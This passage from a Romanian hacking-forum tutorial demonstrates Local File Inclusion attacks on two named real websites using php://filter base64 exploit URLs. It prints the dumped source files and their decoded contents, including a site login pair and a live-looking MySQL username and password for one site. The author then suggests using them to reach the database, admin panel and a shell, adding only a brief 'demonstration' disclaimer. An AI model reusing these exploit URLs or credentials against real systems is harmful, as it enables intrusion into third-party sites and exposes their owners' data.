                      include("ueberschriften.php");
                    ?>
                  </td>
                </tr>
              </table>
            </td>
					</tr>
					<tr>
						<!-- news --->
						<td width=400 valign="top">
						<!-- an dieser stelle php aus datenbank-->
						  <table>
                <tr>
                  <td valign="top">
                    <?php include("news.php") ?>
                  </td>
                </tr>
              </table>
						</td>
						<!--  jeweiliger inhalt -->
						<td width=590 valign="top">
						  <table width=590 id="main">
                <tr>
                  <td width=45> 

                  </td>
                  <td valign="top" width=560>
                    <?php 
                      If (strpos($_REQUEST["page"], "http") === 0 || strpos($_REQUEST["page"], "http") > 0) { $page="home.php"; };
                      If (strpos($_REQUEST["page"], "www") === 0 || strpos($_REQUEST["page"], "www") > 0) { $page="home.php"; };
                      If (strpos($_REQUEST["page"], "ftp") === 0 || strpos($_REQUEST["page"], "ftp") > 0) { $page="home.php"; };
                      If ($page) { include($page); }
                      else { include("home.php"); }
                    ?>
                  </td>
                </tr>
              </table>
						</td>
					</tr>
				</table>
			</td>
		</tr>

In sursa vedem instructiunea urmatoare:


include('user.php');

Acum vom citi pagina user.phphttp://www.bodyworld-schkeuditz.de/index.php?page=php://filter/convert.base64-encode/resource=user.php

Ce am obtinut:


 PD9waHANCg0KICAkdXNlciA9ICJjYW1pYmIiOw0KICAkcGFzcyA9ICJjYW1pYmIiDQoNCg0K

Decodat :


  $user = "camibb";
  $pass = "camibb"

Intram in pagina login.php si ne logam cu datele de mai sus (Nu se poate face mare lucru doar pentru concept).

Un alt exemplu:Impresariat Alwernia - Andrzej Grabowski Show

lfi6.png

http://s17.postimg.org/9q9g8rn7z/lfi6.png

Vom citi index.php http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

lfi7.png

http://s27.postimg.org/5hgc3dkg3/lfi7.png

Ce am obtinut :


 PGhlYWQ+DQo8VElUTEU+SW1wcmVzYXJpYXQgQWx3ZXJuaWEgLSBBbmRyemVqIEdyYWJvd3NraSBTaG93PC9USVRMRT4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTIiPg0KPE1FVEEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCxmb2xsb3csYWxsIj4NCjxNRVRBIG5hbWU9InJldmlzaXQtYWZ0ZXIiIGNvbnRlbnQ9IjIgZGF5cyI+DQo8TUVUQSBuYW1lPSJ0aXRsZSIgY29udGVudD0iSW1wcmVzYXJpYXQgQWx3ZXJuaWEgLSBBbmRyemVqIEdyYWJvd3NraSBTaG93Ij4NCjxNRVRBIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJHcmFib3dza2ksIEltcHJlc2FyaWF0IEFsd2VybmlhLCBBbmRyemVqIEdyYWJvd3NraSBTaG93LCBBbHdlcm5pYSwgU2NlbmFyaXVzeiBkbGEgMyBha3RvcvN3LCBLd2FydGV0IGRsYSA0IGFrdG9y83csIFNjaGFlZmZlciBCb2d1c7NhdywgQWdlbmNqYSBJbXByZXNhcnlqbmEsIEFnZW5jamEgQXJ0eXN0eWN6bmEsICBBZ2VuY2phIFRlYXRyYWxuby1Lb25jZXJ0b3dhIj48IS0tIEFsd2VybmlhLCBHcmFib3dza2kgLS0+DQo8TUVUQSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQW5kcnplaiBHcmFib3dza2kgU2hvdyAtIEdyYWJvd3NjeS5Db20uIEFnZW5jamEgaW1wcmVzYXJ5am5hIEFsd2VybmlhLiBUeWxrbyBuYWpsZXBzemUgc3Bla3Rha2xlLiBJbXByZXNhcmlhdCBBbHdlcm5pYSAtIEFuZHJ6ZWogR3JhYm93c2tpIFNob3ciPjwhLS0gQWx3ZXJuaWEsIEdyYWJvd3NraSAtLT4NCjxNRVRBIG5hbWU9ImFic3RyYWN0IiBjb250ZW50PSJHcmFib3dza2ksIEltcHJlc2FyaWF0IEFsd2VybmlhLCBBbmRyemVqIEdyYWJvd3NraSBTaG93LCBBbHdlcm5pYSwgU2NlbmFyaXVzeiBkbGEgMyBha3RvcvN3LCBLd2FydGV0IGRsYSA0IGFrdG9y83csIFNjaGFlZmZlciBCb2d1c7NhdywgQWdlbmNqYSBJbXByZXNhcnlqbmEsIEFnZW5jamEgQXJ0eXN0eWN6bmEsICBBZ2VuY2phIFRlYXRyYWxuby1Lb25jZXJ0b3dhIj4NCjxNRVRBIG5hbWU9ImF1dGhvciIgY29udGVudD0iR3JhYm93c2tpLCBJbXByZXNhcmlhdCBBbHdlcm5pYSwgQW5kcnplaiBHcmFib3dza2kgU2hvdywgQWx3ZXJuaWEsIFNjZW5hcml1c3ogZGxhIDMgYWt0b3LzdywgS3dhcnRldCBkbGEgNCBha3RvcvN3LCBTY2hhZWZmZXIgQm9ndXOzYXcsIEFnZW5jamEgSW1wcmVzYXJ5am5hLCBBZ2VuY2phIEFydHlzdHljem5hLCAgQWdlbmNqYSBUZWF0cmFsbm8tS29uY2VydG93YSI+DQo8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LUxhbmd1YWdlIiBDT05URU5UPSJwbCI+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiIHNyYz0ianMvc2tyeXB0LmpzIj48L3NjcmlwdD4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQoNCjwhLS0NCmJvZHkgew0KDQoJYmFja2dyb3VuZC1jb2xvcjogIzM1NUM5MTsNCg0KCW1hcmdpbi1sZWZ0OiAwcHg7DQoNCgltYXJnaW4tdG9wOiAwcHg7DQoNCgltYXJnaW4tcmlnaHQ6IDBweDsNCg0KCW1hcmdpbi1ib3R0b206IDBweDsNCg0KfQ0KDQoNCg0KLS0+DQoNCjwvc3R5bGU+PC9oZWFkPiANCg0KPGJvZHk+DQoNCjx0YWJsZSBjbGFzcz0idGFiZWxhemV3bmV0cnpuYSIgYm9yZGVyPTAgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPiANCg0KPHRyPiANCg0KCTx0ZD4gDQoNCgkJPFRBQkxFIGJvcmRlcj0wIGNsYXNzPSJ0YWJlbGF3ZXduZXRyem5hIiBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTA+IA0KDQoJCTxUUj4gDQoNCgkJCTxURCBjb2xzcGFuPSIzIj48P2luY2x1ZGUoImhlYWRlcl9jZW50ZXIuaHRtIik/PjwvVEQ+IA0KDQoJCTwvVFI+IA0KDQoJCTxUUj4NCg0KCQkgICA8dGQgY2xhc3M9ImxlZnRiYWNrZ3JvdW5kIiB2YWxpZ249InRvcCI+PD9pbmNsdWRlKCJsZWZ0Lmh0bSIpPz48L1REPiANCg0KCQkgICA8dGQgY2xhc3M9ImNlbnRlciIgdmFsaWduPSJ0b3AiPg0KDQogICAgICAgICAgICA8PyANCg0KDQoNCiAgICAgICAgICAgICAgIC8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiAgICAgICAgICAgICAgIHJlcXVpcmVfb25jZSAoImFkbWluL2RhdGFfYmFzZS5jbGFzcyIpOw0KDQogICAgICAgICAgICAgICAkY29ubmlkID0gbmV3IERhdGFCYXNlQ29ubmVjdCgpOw0KDQogICAgICAgICAgICAgICAvLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQoNCg0KICAgICAgICAgICAgICAgaW5jbHVkZSAoJ25ld3N5L2VuZ2luZS5waHAzJyk7DQoNCg0KDQogICAgICAgICAgICAgICAkcGFnZSAgICA9ICRfR0VUWydwYWdlJ107DQoNCiAgICAgICAgICAgICAgICRzdWJwYWdlID0gJF9HRVRbJ3N1YnBhZ2UnXTsNCg0KICAgICAgICAgICAgICAgJHBhcmVudCAgPSAkX0dFVFsncGFyZW50J107DQoNCiAgICAgICAgICAgICAgICRwaWQgICAgID0gJF9HRVRbJ3BpZCddOw0KDQoNCg0KICAgICAgICAgICAgICAgaWYgKCEkcGFnZSkgDQoNCiAgICAgICAgICAgICAgICAgIGluY2x1ZGUgKCdjZW50ZXIuaHRtJyk7DQoNCiAgICAgICAgICAgICAgIGVsc2UNCg0KICAgICAgICAgICAgICAgaWYgKCRwYWdlID09ICduZXdzeScgJiYgJHN1YnBhZ2UgPT0gJ3Nob3dhbGwnKQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgnbmV3c3kvbmV3c3kucGhwMycpOw0KDQogICAgICAgICAgICAgICBlbHNlDQoNCiAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PSAnbmV3c3knICYmICRzdWJwYWdlID09ICdzaG93JykNCg0KICAgICAgICAgICAgICAgICAgaW5jbHVkZSAoJ25ld3N5L25ld3MucGhwMycpOw0KICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgaWYgKCRwYWdlID09ICdzdHJvbmEnKQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgnbmV3c3kvc3Ryb25hLnBocDMnKTsNCiAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgZWxzZQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgkcGFnZSk7DQoNCg0KDQogICAgICAgICAgICA/Pg0KDQogICAgICAgICA8L3RkPg0KDQoJCSAgIDx0ZCBjbGFzcz0icmlnaHRiYWNrZ3JvdW5kIiB2YWxpZ249InRvcCI+PD9pbmNsdWRlKCJuZXdzeS9wb2xlY2FteS5waHAzIik/PjwvVEQ+DQoNCgkJPC9UUj4NCg0KCQk8VFI+DQoNCgkJCTx0ZCBjbGFzcz0iZm9vdGVyYmFja2dyb3VuZGxlZnQiPjw/aW5jbHVkZSgiZm9vdGVyX2xlZnQuaHRtIik/PjwvVEQ+IA0KDQoJCQk8dGQgY2xhc3M9ImZvb3RlcmJhY2tncm91bmQiPjw/aW5jbHVkZSgiZm9vdGVyX2NlbnRlci5odG0iKT8+PC9URD4gDQoNCgkJCTx0ZCBjbGFzcz0iZm9vdGVyYmFja2dyb3VuZHJpZ2h0Ij48P2luY2x1ZGUoImZvb3Rlcl9yaWdodC5odG0iKT8+PC9URD4gDQoNCgkJPC9UUj4NCg0KCQk8L3RhYmxlPg0KDQoJPC90ZD4NCg0KPC90cj4NCg0KPC90YWJsZT4NCg0KPC9ib2R5Pg0KPC9odG1sPg==

Decodat:


<head>
<TITLE>Impresariat Alwernia - Andrzej Grabowski Show</TITLE>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-2">
<META name="robots" content="index,follow,all">
<META name="revisit-after" content="2 days">
<META name="title" content="Impresariat Alwernia - Andrzej Grabowski Show">
<META name="keywords" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna,  Agencja Teatralno-Koncertowa"><!-- Alwernia, Grabowski -->
<META name="description" content="Andrzej Grabowski Show - Grabowscy.Com. Agencja impresaryjna Alwernia. Tylko najlepsze spektakle. Impresariat Alwernia - Andrzej Grabowski Show"><!-- Alwernia, Grabowski -->
<META name="abstract" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna,  Agencja Teatralno-Koncertowa">
<META name="author" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna,  Agencja Teatralno-Koncertowa">
<META HTTP-EQUIV="Content-Language" CONTENT="pl">

<script language="JavaScript" src="js/skrypt.js"></script>
<style type="text/css">

<!--
body {

	background-color: #355C91;

	margin-left: 0px;

	margin-top: 0px;

	margin-right: 0px;

	margin-bottom: 0px;

}



-->

</style></head> 

<body>

<table class="tabelazewnetrzna" border=0 cellpadding=0 cellspacing=0> 

<tr> 

	<td> 

		<TABLE border=0 class="tabelawewnetrzna" cellpadding=0 cellspacing=0> 

		<TR> 

			<TD colspan="3"><?include("header_center.htm")?></TD> 

		</TR> 

		<TR>

		   <td class="leftbackground" valign="top"><?include("left.htm")?></TD> 

		   <td class="center" valign="top">

            <? 



               // -----------------------------------------------------------------------------------------------------------------------------------------------------

               require_once ("admin/data_base.class");

               $connid = new DataBaseConnect();

               // -----------------------------------------------------------------------------------------------------------------------------------------------------



               include ('newsy/engine.php3');



               $page    = $_GET['page'];

               $subpage = $_GET['subpage'];

               $parent  = $_GET['parent'];

               $pid     = $_GET['pid'];



               if (!$page) 

                  include ('center.htm');

               else

               if ($page == 'newsy' && $subpage == 'showall')

                  include ('newsy/newsy.php3');

               else

               if ($page == 'newsy' && $subpage == 'show')

                  include ('newsy/news.php3');

               else
                if ($page == 'strona')

                  include ('newsy/strona.php3');

               else

                  include ($page);



            ?>

         </td>

		   <td class="rightbackground" valign="top"><?include("newsy/polecamy.php3")?></TD>

		</TR>

		<TR>

			<td class="footerbackgroundleft"><?include("footer_left.htm")?></TD> 

			<td class="footerbackground"><?include("footer_center.htm")?></TD> 

			<td class="footerbackgroundright"><?include("footer_right.htm")?></TD> 

		</TR>

		</table>

	</td>

</tr>

</table>

</body>
</html>

Ce este interesant in pagina sursa este admin/data_base.class si ii vom citi sursa http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=admin/data_base.class

De acolo am obtinut :


 PD8NCmNsYXNzIERhdGFCYXNlQ29ubmVjdA0Kew0KICAgdmFyICRteXNxbGlkY29ubjsNCiAgIHZhciAkZGF0YWJhc2VuYW1lOw0KICAgdmFyICRyZXN1bHRzOw0KICAgdmFyICR0YWJsZW5hbWU7DQoNCiAgIGZ1bmN0aW9uIERhdGFCYXNlQ29ubmVjdCgpDQogICB7DQovLyAgICAgICRteXNxbF9ob3N0ID0gImxvY2FsaG9zdCI7DQovLyAgICAgICRteXNxbF91c2VyID0gInJvb3QiOw0KLy8gICAgICAkbXlzcWxfcGFzcyA9ICIiOw0KDQogICAgICAkbXlzcWxfaG9zdCA9ICJsb2NhbGhvc3QiOw0KICAgICAgJG15c3FsX3VzZXIgPSAiZ3JhYm93c2N5IjsNCiAgICAgICRteXNxbF9wYXNzID0gInFISW5KaTRvIjsNCg0KICAgICAgJG15c3FsX2RiX25hbWUgPSAiZ3JhYm93c2N5IjsNCiAgICAgICRuYXp3YV90YWJlbGkgPSAgImdyYWJvd3NjeV8iOw0KDQogICAgICAkaWRfY29ubiA9IEBteXNxbF9jb25uZWN0KCRteXNxbF9ob3N0LCRteXNxbF91c2VyLCRteXNxbF9wYXNzKSBvcg0KICAgICAgICAgZGllKCc8c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFZlcmRhbmE7IGZvbnQtc2l6ZTogMTNweCI+PGI+UHJvYmxlbSB6IGRvc3TqcGVtIGRvIHNlcndlcmEgYmF6eSBkYW55Y2g8L2I+Jyk7DQogICAgICBAbXlzcWxfc2VsZWN0X2RiKCRteXNxbF9kYl9uYW1lKSBvcg0KICAgICAgICAgZGllKCc8c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFZlcmRhbmE7IGZvbnQtc2l6ZTogMTNweCI+PGI+UHJvYmxlbSB6IGRvc3TqcGVtIGRvIGJhenkgZGFueWNoLjwvYj4nKTsNCg0KICAgICAgJHRoaXMgLT4gbXlzcWxpZGNvbm4gPSAkaWRfY29ubjsNCiAgICAgICR0aGlzIC0+IGRhdGFiYXNlbmFtZSA9ICRteXNxbF9kYl9uYW1lOw0KICAgICAgJHRoaXMgLT4gdGFibGVuYW1lID0gJG5hendhX3RhYmVsaTsNCiAgIH0NCg0KICAgZnVuY3Rpb24gQ2hlY2tUYWJsZUV4aXN0cygkdGFibGUpDQogICB7DQogICAgICAgJHRoaXMtPnJlc3VsdHMgPSBteXNxbF9kYl9xdWVyeSgkdGhpcy0+ZGF0YWJhc2VuYW1lLCAiU0VMRUNUIDEgRlJPTSBgJHRhYmxlYCBMSU1JVCAwIiwgJHRoaXMtPm15c3FsaWRjb25uKTsNCiAgICAgICByZXR1cm4gJHRoaXMtPnJlc3VsdHM7DQogICB9DQoNCiAgIGZ1bmN0aW9uIFF1ZXJ5VG9EYXRhQmFzZSgkcXVlcnkpDQogICB7DQogICAgICAgJHRoaXMtPnJlc3VsdHMgPSBteXNxbF9xdWVyeSgkcXVlcnkpIG9yDQogICAgICAgICAgZGllKCJQcm9ibGVtIHogZG9zdOpwZW0gZG8gYmF6eSBkYW55Y2guICIuJHF1ZXJ5KTsNCiAgICAgICByZXR1cm4gJHRoaXMtPnJlc3VsdHM7DQogICB9DQoNCn0NCj8+DQo=

Decodat:


<?
class DataBaseConnect
{
   var $mysqlidconn;
   var $databasename;
   var $results;
   var $tablename;

   function DataBaseConnect()
   {
//      $mysql_host = "localhost";
//      $mysql_user = "root";
//      $mysql_pass = "";

      $mysql_host = "localhost";
      $mysql_user = "grabowscy";
      $mysql_pass = "qHInJi4o";

      $mysql_db_name = "grabowscy";
      $nazwa_tabeli =  "grabowscy_";

      $id_conn =  @Mysql_select_db($mysql_db_name) or
         die('<span style="font-family: Verdana; font-size: 13px"><b>Problem z dostêpem do bazy danych.</b>');

      $this -> mysqlidconn = $id_conn;
      $this -> databasename = $mysql_db_name;
      $this -> tablename = $nazwa_tabeli;
   }

   function CheckTableExists($table)
   {
       $this->results = mysql_db_query($this->databasename, "SELECT 1 FROM `$table` LIMIT 0", $this->mysqlidconn);
       return $this->results;
   }

   function QueryToDataBase($query)
   {
       $this->results = mysql_query($query) or
          die("Problem z dostêpem do bazy danych. ".$query);
       return $this->results;
   }

}
?>

si voala :


      $mysql_user = "grabowscy";
      $mysql_pass = "qHInJi4o";

      $mysql_db_name = "grabowscy";

De aici puteti obtine acces la baza de date ,sa luam acces la panou de adminitrare si shell:D.

Aceste exemple au fost date doar pentru a demonstra impactul vurnarabilitati.

Cam atat am avut de spus sper sa va fi fost de folos tutorialul.

O zi buna:D.

Edited by danyweb09
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...